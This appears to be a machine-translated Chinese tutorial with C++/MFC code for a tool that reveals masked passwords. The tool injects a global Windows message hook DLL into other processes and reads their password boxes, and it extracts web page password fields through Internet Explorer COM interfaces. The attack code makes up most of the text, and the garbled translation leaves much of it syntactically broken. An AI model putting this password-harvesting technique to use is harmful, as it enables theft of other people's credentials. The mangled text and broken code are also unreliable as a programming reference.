Look at Win2000, WinXP, **********

zhaozj2021-02-16  96

This article will tell how to program how to program the password in the password box in the win2000 and remember that the password in the web password box in the application in the application, you can easily get the message to send a WM_GETTEXT to a password box. The password, Microsoft may already realize that this uneasy factor, in Win2000 / XP, write an application like that, to send a WM_GETTEXT message from the password box of other programs, reasons It is in the process between the processes, if the parameter window handle does not belong to the call thread, the function execution will fail, in order to solve this problem, we can use the hook function, and the hook function is generally in the dynamic link library. Win32 automatically maps the dynamic link library to its various processes, where other functions of this dynamic link library will also be mapped to the process of running. Such hook functions will also be integrated with its host program window. In such a process, since the DLL insert map makes the function parameter window handle HWnd belongs to the process, this is allowed by Win32. So write a DLL and inject it into a password, so you can see a process of the process, and then use WM_CopyData to perform the process of communication to send the password to the program we want to display. After the theory, I started to use VC to make a program. First create a dialog-based program getPass, and other options are default. Add an Edit control, its ID is IDC_EDIT1 to display the resulting password information. Add const cWnd * pwndinsertafter; pwndinsertafter = & wndtopmost; setWindowpos (PWNDINSERTAFTER, 0, 0, 0, 0, SWP_NOSIZE); // Place the window in the uppermost layer

SetTimer (1,100, null); // Get a password every 500 milliseconds.

BOOL K = IITHOK (THIS-> M_HWND); // Mount Hook IF (K == False) AFXMessageBox ("false"); reload the ONTIMER function, add the following code hWnd hwnd; cpoint mousepos; getCursorpos (& MousePos); / / Get the coordinates of the current mouse

HWnd = :: windowfromPoint (mousepos); // Get the handle getPasstext (hwnd, m_hwnd) of the corresponding window of the current coordinate; // Call this function to get a password

Starting classwzard WM_COPYDATA response message for the added function OnCopyData (CWnd * pWnd, COPYDATASTRUCT * pCopyDataStruct) add the following code to obtain code came dll: SetDlgItemText (IDC_EDIT1, (LPCTSTR) pCopyDataStruct-> lpData); our time compiler program There will be two errors as the following error C2065: 'IITHOK': undeclared Identifiererror C2065: 'getPassText': undeclared Identifier These two functions are we want to build in the DLL. So we create a new project, select the MFC AppWizard (DLL), and add to current workplace and select Add to Current Workspace. Other default values. First add variables and macro definitions on Password.cpp

#define MAX_TEXTLEN 1024 # define UM_GETPASS WM_USER 0x392HINSTANCE ghInstance = 0; #pragma data_seg ( "ALLDATA") HHOOK g_hHook = NULL; HINSTANCE g_hDllIns = NULL; HWND g_hHostWnd = NULL; #pragma data_seg () and then rewrite the code at its Password.def As follows: library "password" Description 'Password Windows Dynamic Link Library'Exports INITHOOK @ 1 ReleaseHook @ 2 getPassText @ 3sections AllData Shared

// We manually join the function declaration with the variables to add CPasswordapp for CPasswordapp :: InitInstance () in:

g_hdllins = afxgetInstanceHandle (); disablethreadlibraryCalls (g_hdllins); then add the following code after the global variable CPasswordApp THEAPP in Password.cpp:

LResult Callback getMsgProc (int code, wparam wparam, lparam lparam) {try {if (code> = 0) {

LPMSG PMSG = (LPMSG) LPARAM;

HWnd hshowpasswnd = (hwnd) PMSG-> LPARAM;

IF (pmsg-> message == um_getpass && g_hhostwnd == hshowpasswnd) {// Get content in *

HWND HPASSWND = (hwnd) PMSG-> wparam; // * number window HWnd

if (hPassWnd) {TCHAR szPassText [MAX_TEXTLEN]; ZeroMemory (szPassText, MAX_TEXTLEN); :: SendMessage (hPassWnd, WM_GETTEXT, MAX_TEXTLEN, (LPARAM) szPassText); // Get content COPYDATASTRUCT cd; ZeroMemory (& cd, sizeof (cd)) ; cd.dwData = (DWORD) hPassWnd; cd.cbData = strlen (szPassText) 1; cd.lpData = szPassText; SendMessage (hShowPassWnd, WM_COPYDATA, (WPARAM) hPassWnd, (LPARAM) & cd); // send window to ShowPass }}}} Catch (...) {}

Return CallNexthookex (g_hook, code, wparam, lparam);} Bool INITHOOK (HWND HWND) {Return False;}

g_hHostWnd = hWnd; g_hHook = SetWindowsHookEx (WH_GETMESSAGE, GetMsgProc, g_hDllIns, 0); return g_hHook = NULL;!} catch (...) {return FALSE;}} HWND WINAPI GetParentFromHwnd (HWND hWnd) {HWND hParWnd; try {do {Hparwnd = getParent (hwnd); if (hwnd) {hwnd = hparwnd;}} while (hparwnd);} catch (...) {} return hwnd;}

void GetPassText (HWND hWndPass, HWND hWndShowPass) {try {HWND hParWnd = GetParentFromHwnd (hWndPass); :: PostMessage (hParWnd, UM_GETPASS, (WPARAM) hWndPass, (LPARAM) hWndShowPass);} catch (...) {}} / / uninstall BOOL ReleaseHook () {BOOL bSuccess = FALSE; try {if (g_hHook = NULL!) {bSuccess = UnhookWindowsHookEx (g_hHook) TRUE: FALSE; g_hHook = NULL; g_hHostWnd = NULL;}} catch (...) {? } return bSuccess;} function added export declaration extern "C" in the Password.h _declspec (dllexport) void GetPassText (HWND hWndPass, HWND hWndShowPass); extern "C" _declspec (dllexport) BOOL InitHook (HWND hWnd); extern " C "_declspec (dllexport) Bool ReleaseHook ();

Finally compile, link, copy the generated password.dll, password.lib to the directory of the getPass project, the top of the getPassDlg.cpp at the getPass Enginee, the top of the following code #pragma Comment (Lib, "Password.lib") //// implicit link extern "C" _declspec (dllexport) void GetPassText (HWND hWndPass, HWND hWndShowPass); extern "C" _declspec (dllexport) BOOL InitHook (HWND hWnd); extern "C" _declspec (dllexport) BOOL ReleaseHook (); final Run the program, you can see the password to the cryptographic box of the mouse point to the application. But when we point your mouse to the password box on the page, we can't get its content, because the webpage password box is not a general EDIT control, so you can't get the handle of the web page password box. To implement this feature, you have to pass the WebBrowser control related COM interface. So obtain these interfaces is the key to the entire program. You can find the ihtmldocument2 interface of the WebBrowser control in different processes on different processes. It is to send to the WebBrowser control (window class name is "Internet Explorer_server") a WM_HTML_GETOBJECT, then the return value is passed to Microsoft Active Accessibility (MSAA) function ObjectFromLresult, so you will have made a choreography (Marshaling) through the COM interface function shown as follows:. IHTMLDocument2 * GetDocInterface (HWND hWnd) {// we need The display will load oleacc.dll, so we know if there is any installation of MSAA Hinstance Hinst = :: LoadLibrary (_T ("Oleacc.dll")); htmldocument2 * pdoc2 = null; if (hinst! = Null) {if (hwnd! = NULL) {CComPtr spDoc = NULL; LRESULT lRes; / * since WM_HTML_GETOBJECT non-Windows standard message, it is necessary RegisterWindowMessage * / UINT nMsg = :: RegisterWindowMessage (_T ( "WM_HTML_GETOBJECT")); :: SendMessageTimeout (hWnd, NMSG, 0L, 0L, SMTO_ABORTIFHUNG, 1000, (DWORD *) & lres);

/ * Function address acquired ObjectFromLresult * / LPFNOBJECTFROMLRESULT pfObjectFromLresult = (LPFNOBJECTFROMLRESULT) :: GetProcAddress (hInst, _T ( "ObjectFromLresult")); if (! PfObjectFromLresult = NULL) {HRESULT hr; hr = pfObjectFromLresult (lRes, IID_IHTMLDocument, 0, (void **) & spDoc); if (SUCCEEDED (hr)) {CComPtr spDisp; CComQIPtr spWin; spDoc-> get_Script (& spDisp); spWin = spDisp; spWin-> get_document (& pDoc2);}} }: FreeElibrary (hinst);} else {// If MsaA AfxMessageBox is installed (_T ("Please install Microsoft Active Accessibility);} Return PDOC2;} Please note. If the program is in Windows 95, 98, and NT 4.0 Service WITH PACK 4 OR 5 runs to run the Microsoft Active Accessibility (MSAA) Runtime Components (RDK) with programs (Windows2000 and Windows NT 4.0 Service With Pack 6 is already, so no) .. 3. Use this Coinitialize (NULL) should be called before the method; then COUNITIALIZE () should then be called in CGETPASSDLG :: OnNitdialog (), then add Coinitialize (null); then overload the WM_DESTROY message, in its corresponding function void cgetpassdlg: : OnDestroy () Add the following code: Couninitialize (); // Uninstall the COM component KillTimer (1); // Uninstall the clock

In this way, we have achieved the IHTMLDocument2 * interface. If you want to get the password of the password box, we have to have a twice. Now it is now rewritten the Void CgetPassdlg :: ONTIMER (Uint Nidevent) function we just have just now, and its rewriting is as follows: hwnd HWnd; cpoint mousepos; getCursorpos (& mousepos); // get the coordinate static tchar buf [100] of the current mouse; hWnd = :: windowfromPoint (mousepos); // Get the handle if the current coordinates of the corresponding window of the current coordinate (hWnd! = null) {:: getclassname (hwnd, (lptstr) & buf, 100); if (_TCSCMP (BUF, _T ("Internet Explorer_server")) == 0) // If it is IE, other methods {Point IEPT = mousepos; : ScreenToClient (HWND, & IEPT); GetPassword (GetDocinterface (hwnd),} ELSE // If it is other window, use the original method to get the password

GetPassText (hwnd, m_hwnd);

转载请注明原文地址:https://www.9cbs.com/read-12068.html

New Post(0)